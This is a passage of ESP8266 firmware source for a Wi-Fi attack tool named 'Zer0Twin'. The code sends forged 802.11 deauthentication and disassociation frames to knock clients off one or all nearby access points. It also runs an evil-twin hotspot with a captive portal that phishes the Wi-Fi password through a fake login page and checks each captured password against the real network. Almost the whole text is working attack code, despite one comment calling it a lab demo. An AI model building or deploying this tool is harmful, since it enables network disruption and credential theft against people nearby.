text-transform:uppercase;background:#2f3136;border-radius:4px;border:none;cursor:pointer}
button:hover{background:#42444a}
h1{font-size:1.4rem;background:#2f3136;color:#bfbfbb;padding:.2em .6em;border-radius:3px;
border-left:solid #d1114d 5px;font-weight:100}
#mon{font-family:monospace;color:#37c6f0;font-size:.8em;padding:.4em 0;word-break:break-all}
</style></head><body><div class='content'>
<h1 style="text-align:center;font-size:2rem;border:solid #bd0b61 3px">Zer0Twin v1.0</h1>
<div id='mon'>memuat status...</div>
<h1>Att4ck</h1>
)HTML";

String panelHtml(){
  String _html = FPSTR(PANEL_HEAD);

  _html += "<div><form style='display:inline-block' method='post' action='/?deauth=";
  _html += deauthing_active ? "stop'><button" : "start'><button";
  if(_selectedNetwork.ssid.length() == 0) _html += " disabled";
  _html += ">"; _html += deauthing_active ? "Stop" : "Deauth Target";
  _html += "</button></form>";
  _html += "<form style='display:inline-block;padding-left:8px' method='post' action='/?deauth=all'>"
           "<button style='background:#8a3b12'>Deauth Semua</button></form>";

  if(hotspot_active){
    _html += "<form style='display:inline-block;padding-left:8px' method='post' action='/?hotspot=stop'>"
             "<button>Stop Evil-Twin</button></form>";
  } else {
    _html += "<form style='display:inline-block;padding-left:8px' method='post' action='/?hotspot=start'>"
             "<button"; if(_selectedNetwork.ssid.length() == 0) _html += " disabled";
    _html += ">Start Evil-Twin</button></form>";
    _html += "<form style='display:inline-block;padding-left:8px' method='post' action='/?hotspot=start&amp;similar=1'>"
             "<input name='suffix' size='5' maxlength='8' value='" + twinSuffix + "' title='akhiran nama, mis. 5G'>"
             "<button"; if(_selectedNetwork.ssid.length() == 0) _html += " disabled";
    _html += " style='background:#7a4d1f'>Clone + Akhiran</button></form>";
  }

  _html += "<form style='display:inline-block;padding-left:8px' method='post' action='/?stop=1'>"
           "<button>Stop Semua</button></form></div>";

  _html += "<p style='font-size:.8em;color:#8ab4f8'>Dashboard operator selalu bisa dibuka di "
           "<b>http://192.168.4.1/panel</b> walau twin sedang aktif.</p>";

  _html += "<h1>AP Kontrol</h1><form method='post' action='/?setap=1' style='padding-bottom:.6em'>"
           "<label>SSID <input name='ssid' maxlength='32' value='" + String(apSsid) + "'></label> "
           "<label>Password <input name='pass' maxlength='32' value='" + String(apPass) +
           "' placeholder='kosong = terbuka'></label> "
           "<button>Simpan AP</button></form>";

  _html += "<h1>P4nel</h1><table><tr><th>SSID</th><th>RSSI</th><th>BSSID</th><th>CH</th><th></th></tr>";
  for(int i = 0; i < 16; i++){
    if(_networks[i].ssid == "") break;
    _html += "<tr><td>" + _networks[i].ssid + "</td><td>" + String(_networks[i].rssi) +
             "</td><td>" + bytesToStr(_networks[i].bssid, 6) + "</td><td>" + String(_networks[i].ch) + "</td>";
    _html += "<td><form method='post' action='/?ap=" + bytesToStr(_networks[i].bssid, 6) + "'>";
    if(bytesToStr(_selectedNetwork.bssid, 6) == bytesToStr(_networks[i].bssid, 6))
      _html += "<button style='background:#20c20e;color:#000'>Selected</button>";
    else
      _html += "<button>Select</button>";
    _html += "</form>";
    _html += "<form style='display:inline' method='post' action='/?deauth=one&b=" + bytesToStr(_networks[i].bssid, 6) + "'>"
             "<button style='background:#8a3b12;margin-left:4px'>Deauth</button></form></td></tr>";
  }
  _html += "</table><br>";

  if(_correct != "") _html += "<h1>R3sult</h1><h3>" + _correct + "</h3>";

  _html += "<script>setInterval(async function(){try{let s=await (await fetch('/api/status')).json();"
           "document.getElementById('mon').textContent='up '+s.up+'s | heap '+s.heap+' | target '"
           "+s.target+' | deauth '+s.deauth+' | twin '+s.twin+' | pkt '+s.pkt+' | btn '+s.btn+' ('+s.btnRaw+')"
           "+' | pass '+(s.pass||'-');}catch(e){}},2000);</script>";
  _html += "</div></body></html>";
  return _html;
}

// halaman login yang dilihat korban (demo lab)
String loginPage(){
  String a = String(_selectedNetwork.ssid);
  String h = R"HTML(<!DOCTYPE html><html lang="id"><head><meta charset="utf-8">
<meta name="viewport" content="width=device-width,initial-scale=1,maximum-scale=1">
<title>TITLE :: Login Jaringan</title><style>
*{box-sizing:border-box}
body{margin:0;min-height:100vh;display:flex;align-items:center;justify-content:center;
background:linear-gradient(160deg,#eef2f7 0%,#dbe5f1 100%);font-family:-apple-system,"Segoe UI",Roboto,Arial,sans-serif;color:#1f2937}
.card{width:min(92vw,380px);background:#fff;border-radius:14px;box-shadow:0 10px 30px rgba(15,40,80,.14);overflow:hidden}
.head{background:#0b63c5;color:#fff;padding:22px 22px 18px;text-align:center}
.icon{width:54px;height:54px;border-radius:50%;background:rgba(255,255,255,.16);margin:0 auto 10px;display:flex;align-items:center;justify-content:center}
.icon svg{width:30px;height:30px;fill:#fff}
h1{font-size:1.05rem;margin:0;font-weight:600}
.head .ssid{margin:6px 0 0;font-size:.85rem;font-weight:700;letter-spacing:.02em}
.head .sub{margin:2px 0 0;font-size:.75rem;opacity:.85}
.body{padding:22px}
label{display:block;font-size:.78rem;font-weight:600;color:#475569;margin-bottom:6px}
.wrap{position:relative;margin-bottom:14px}
input[type=password],input[type=text]{width:100%;padding:12px 44px 12px 12px;font-size:.95rem;
border:1px solid #cbd5e1;border-radius:9px;outline:none;background:#fff}
input:focus{border-color:#0b63c5;box-shadow:0 0 0 3px rgba(11,99,197,.13)}
.eye{position:absolute;right:6px;top:50%;transform:translateY(-50%);border:0;background:none;
color:#64748b;padding:8px;cursor:pointer;font-size:1rem;line-height:1}
.row{display:flex;align-items:center;gap:8px;font-size:.8rem;color:#475569;margin:0 0 16px}
.row input{width:auto}
.row label{margin:0;font-weight:400;font-size:.8rem;color:#475569}
.go{width:100%;padding:12px;border:0;border-radius:9px;background:#0b63c5;color:#fff;font-size:.95rem;font-weight:600;cursor:pointer}
.go:active{background:#0952a3}
.foot{padding:0 22px 18px;font-size:.7rem;color:#94a3b8;text-align:center;line-height:1.5}
</style></head><body>
<div class="card">
  <div class="head">
    <div class="icon"><svg viewBox="0 0 24 24"><path d="M12 18.5a1.5 1.5 0 1 0 0 3 1.5 1.5 0 0 0 0-3zm0-5.5c-1.9 0-3.6.8-4.8 2l1.6 1.6A5 5 0 0 1 12 15c1.2 0 2.3.5 3.2 1.1l1.6-1.6A6.9 6.9 0 0 0 12 13zm0-5C9.2 8 6.6 9.1 4.7 11l1.6 1.6A8.9 8.9 0 0 1 12 10c2.2 0 4.2.8 5.7 2.2l1.6-1.6A11 11 0 0 0 12 8zm0-5C8 3 4.3 4.6 1.6 7.3L3.2 9c2.2-2.2 5.3-3.5 8.8-3.5s6.6 1.3 8.8 3.5l1.6-1.6A14.9 14.9 0 0 0 12 3z"/></svg></div>
    <h1>Login Jaringan</h1>
    <p class="ssid">SSID</p>
    <p class="sub">Koneksi terputus sementara</p>
  </div>
  <div class="body">
    <form method="get" action="/">
      <label for="pw">Kata sandi WiFi</label>
      <div class="wrap">
        <input id="pw" type="password" name="password" placeholder="Masukkan kata sandi" autofocus required>
        <button class="eye" type="button" onclick="t()" aria-label="lihat">&#128065;</button>
      </div>
      <div class="row"><input type="checkbox" id="rm"><label for="rm">Ingat perangkat ini</label></div>
      <button class="go" type="submit">Masuk</button>
    </form>
  </div>
  <div class="foot">Masukkan kata sandi untuk menyambung kembali ke jaringan.</div>
</div>
<script>function t(){var i=document.getElementById('pw');i.type=i.type==='password'?'text':'password';}</script>
</body></html>)HTML";
  h.replace("SSID", a);      // String::replace() void di core ESP8266
  h.replace("TITLE", a);
  return h;
}

// ---------------- route -----------------------------------------------------
void handlePanel(){
  webServer.send(200, "text/html", panelHtml());
}

void handleStatus(){
  String s = "{\"up\":" + String(millis()/1000) +
             ",\"heap\":" + String(ESP.getFreeHeap()) +
             ",\"target\":\"" + _selectedNetwork.ssid + "\"" +
             ",\"deauth\":" + String(deauthing_active ? "\"ON\"" : "\"off\"") +
             ",\"twin\":" + String(hotspot_active ? "\"ON\"" : "\"off\"") +
             ",\"pkt\":" + String(sentFrames) +
             ",\"btn\":\"" + String(btnLast) + "\"" +
             ",\"btnRaw\":" + String(btnRaw) +
             ",\"pass\":\"" + _tryPassword + "\"" +
             ",\"ssid\":\"" + String(apSsid) + "\"" +
             ",\"twinSsid\":\"" + twinSsid + "\"" +
             ",\"twinSimilar\":" + String(twinSimilar ? "true" : "false") + "}";
  webServer.send(200, "application/json", s);
}

void handleResult(){
  if(WiFi.status() != WL_CONNECTED){
    oledStatus("pass salah");
    webServer.send(200, "text/html",
      "<html><head><script>setTimeout(function(){window.location.href='/';},3000);</script>"
      "<meta name='viewport' content='initial-scale=1.0, width=device-width'>"
      "<body><h2>You entered wrong password</h2><p>Try again...</p></body></html>");
    return;
  }
  _correct = "Password for " + _selectedNetwork.ssid + "<br>Result: " + _tryPassword;
  oledStatus("pass BENAR");
  deauthing_active = false;
  stopHotspot();
  webServer.send(200, "text/html",
    "<html><head><meta name='viewport' content='initial-scale=1.0, width=device-width'>"
    "<body><h2>System repair has been completed!</h2></body></html>");
}

void handleIndex(){
  if(webServer.hasArg("ap")){
    for(int i = 0; i < 16; i++){
      if(bytesToStr(_networks[i].bssid, 6) == webServer.arg("ap")){
        _selectedNetwork = _networks[i];
        oledStatus("target: " + _selectedNetwork.ssid);
      }
    }
  }

  if(webServer.hasArg("setap")){
    String ns = webServer.arg("ssid"); ns.trim();
    String np = webServer.arg("pass"); np.trim();
    if(ns.length() >= 1 && ns.length() <= 32) ns.toCharArray(apSsid, sizeof(apSsid));
    if(np.length() == 0 || np.length() >= 8)  np.toCharArray(apPass, sizeof(apPass));
    saveApCfg();
    applyApCfg();
    oledStatus(String("AP: ") + apSsid);
    webServer.send(200, "text/html", panelHtml());
    return;
  }

  if(webServer.hasArg("deauth")){
    String d = webServer.arg("deauth");
    if(d == "one"){
      String want = webServer.arg("b");
      singleIdx = -1; deauthAll = false;
      for(uint8_t i = 0; i < 16; i++){
        if(bytesToStr(_networks[i].bssid, 6) == want){ singleIdx = i; _selectedNetwork = _networks[i]; break; }
      }
      if(singleIdx < 0){ webServer.send(400, "text/plain", "AP tidak ada, scan ulang"); return; }
      deauthing_active = true;
      oledStatus("deauth 1 AP: " + _networks[singleIdx].ssid);
    } else if(d == "start" || d == "all"){
      singleIdx = -1;
      if(d == "all"){
        bool ada = false;
        for(uint8_t i = 0; i < 16; i++) if(_networks[i].ssid.length()) { ada = true; break; }
        if(!ada) performScan();          // daftar kosong -> scan dulu
        deauthAll = true;
      } else {
        deauthAll = false;
      }
      deauthing_active = true;
      rrIdx = 0;
      oledStatus(deauthAll ? "deauth SEMUA" : "deauth target");
    } else {
      deauthing_active = false;
      deauthAll = false;
      singleIdx = -1;
      wifi_set_channel(hotspot_active ? _selectedNetwork.ch : 1);
      oledStatus("deauth off");
    }
    webServer.send(200, "text/html", panelHtml());
    return;
  }

  if(webServer.hasArg("hotspot")){
    if(webServer.hasArg("suffix")){
      String sf = webServer.arg("suffix"); sf.trim();
      if(sf.length() <= 8){ twinSuffix = sf; saveApCfg(); }
    }
    if(webServer.arg("hotspot") == "start") startHotspot(webServer.hasArg("similar"));
    else                                    stopHotspot();
    webServer.send(200, "text/html", panelHtml());
    return;
  }

  if(webServer.hasArg("stop")){
    stopAll();
    webServer.send(200, "text/html", panelHtml());
    return;
  }

  if(hotspot_active && webServer.hasArg("password")){
    _tryPassword = webServer.arg("password");
    WiFi.disconnect();
    WiFi.begin(_selectedNetwork.ssid.c_str(), _tryPassword.c_str(),
               _selectedNetwork.ch, _selectedNetwork.bssid);
    oledStatus("coba pass...");
    webServer.send(200, "text/html",
      "<html><head><meta name='viewport' content='initial-scale=1.0, width=device-width'>"
      "<script>setTimeout(function(){window.location.href='/result';},15000);</script>"
      "<body><h2>Repairing router system...</h2><p>Please wait...</p></body></html>");
    return;
  }

  if(hotspot_active){
    webServer.send(200, "text/html", loginPage());
    return;
  }

  webServer.send(200, "text/html", panelHtml());
}

// ---------------- setup / loop ---------------------------------------------
void setup(){
  Serial.begin(115200);

  if(!display.begin(SSD1306_SWITCHCAPVCC, 0x3C)){
    Serial.println(F("SSD1306 allocation failed"));
    for(;;);
  }
  display.clearDisplay();
  display.drawBitmap(0, 0, zeroTwinBoot, 128, 64, WHITE);
  display.display();

  LittleFS.begin();
  loadApCfg();

  WiFi.mode(WIFI_AP_STA);
  wifi_promiscuous_enable(1);
  WiFi.softAPConfig(IPAddress(192,168,4,1), IPAddress(192,168,4,1), IPAddress(255,255,255,0));
  WiFi.softAP(apSsid, apPass);
  dnsServer.start(53, "*", IPAddress(192,168,4,1));

  webServer.on("/",           handleIndex);
  webServer.on("/result",     handleResult);
  webServer.on("/panel",      handlePanel);
  webServer.on("/api/status", handleStatus);
  webServer.onNotFound(handleIndex);      // URL deteksi HP -> panel: captive auto-buka
  webServer.begin();

  performScan();
  oledStatus("siap");
  Serial.printf("[ZT] AP %s http://192.168.4.1\n", apSsid);
}

// Satu frame deauth/disassoc untuk satu BSSID.
// reason: 1=unspecified, 2=auth invalid, 7=class3.
void sendFrame(const uint8_t* bssid, uint8_t type, uint8_t reason){
  uint8_t f[26] = { type, 0x00, 0x00, 0x00,
                    0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF,
                    0, 0, 0, 0, 0, 0,
                    0, 0, 0, 0, 0, 0,
                    0x00, 0x00, reason, 0x00 };
  memcpy(&f[10], bssid, 6);
  memcpy(&f[16], bssid, 6);
  wifi_send_pkt_freedom(f, sizeof(f), 0);
  sentFrames++;
}

// Satu burst menembak SEMUA BSSID yang SSID-nya sama dengan target:
// kasus nyata di lapangan, satu router memancarkan beberapa BSSID
// (2.4 GHz, 5 GHz, repeater/mesh) sehingga client bisa nyangkut di BSSID lain.
void deauthBurst(){
  uint8_t hit = 0;
  for(int i = 0; i < 16 && hit < 4; i++){
    if(_networks[i].ssid != _selectedNetwork.ssid) continue;
    if(_networks[i].ch == 0) continue;
    wifi_set_channel(_networks[i].ch);
    delay(4);                        // radio perlu settle setelah pindah kanal
    sendFrame(_networks[i].bssid, 0xC0, 7);
    sendFrame(_networks[i].bssid, 0xC0, 1);
    sendFrame(_networks[i].bssid, 0xA0, 7);
    sendFrame(_networks[i].bssid, 0xA0, 1);
    sendFrame(_networks[i].bssid, 0xC0, 2);
    hit++;
  }
  if(hit == 0){                       // daftar scan kosong: tetap tembak target terpilih
    wifi_set_channel(_selectedNetwork.ch);
    for(uint8_t r : { (uint8_t)7, (uint8_t)1, (uint8_t)2 }){
      sendFrame(_selectedNetwork.bssid, 0xC0, r);
      sendFrame(_selectedNetwork.bssid, 0xA0, r);
    }
  }
  // TIDAK kembali ke kanal 1 selama menyerang: firmware NetherCap asli juga
  // parkir di kanal target, itu sebabnya deauth-nya kena device sekitar.
  if(!deauthing_active) wifi_set_channel(hotspot_active ? _selectedNetwork.ch : 1);
}

// Mode "deauth semua": tiap giliran tembak SATU AP (yang terdeteksi), bergilir.
// Cakupan luas, tapi tiap AP kena lebih jarang dibanding mode fokus.
// Mode tunggal: hanya satu BSSID (baris yang lu klik "Deauth").
void deauthSingleStep(){
  if(singleIdx < 0 || singleIdx >= 16) return;
  if(_networks[singleIdx].ssid.length() == 0 || _networks[singleIdx].ch == 0) return;
  wifi_set_channel(_networks[singleIdx].ch);
  delay(4);
  const uint8_t* b = _networks[singleIdx].bssid;
  sendFrame(b, 0xC0, 7);
  sendFrame(b, 0xC0, 1);
  sendFrame(b, 0xA0, 7);
  sendFrame(b, 0xA0, 1);
  sendFrame(b, 0xC0, 2);
}

void deauthAllStep(){
  for(uint8_t k = 0; k < 16; k++){
    rrIdx = (rrIdx + 1) % 16;
    if(_networks[rrIdx].ssid.length() == 0 || _networks[rrIdx].ch == 0) continue;
    wifi_set_channel(_networks[rrIdx].ch);
    delay(4);
    sendFrame(_networks[rrIdx].bssid, 0xC0, 7);
    sendFrame(_networks[rrIdx].bssid, 0xC0, 1);
    sendFrame(_networks[rrIdx].bssid, 0xA0, 7);
    sendFrame(_networks[rrIdx].bssid, 0xA0, 1);
    sendFrame(_networks[rrIdx].bssid, 0xC0, 2);
    return;
  }
}

void loop(){

  dnsServer.processNextRequest();
  webServer.handleClient();
  handleButtons();

  if(deauthing_active && (deauthAll || _selectedNetwork.ssid.length()) && millis() - deauth_now >= 400){
    if(singleIdx >= 0)  deauthSingleStep();
    else if(deauthAll)  deauthAllStep();
    else                deauthBurst();
    deauth_now = millis();
  }

  if(millis() - now >= 15000){ if(!deauthing_active) performScan(); now = millis(); }

  if(millis() - oled_now >= 1000){ oledStatus(""); oled_now = millis(); }

  if(millis() - wifinow >= 5000){ wifinow = millis(); }
  delay(2);
}
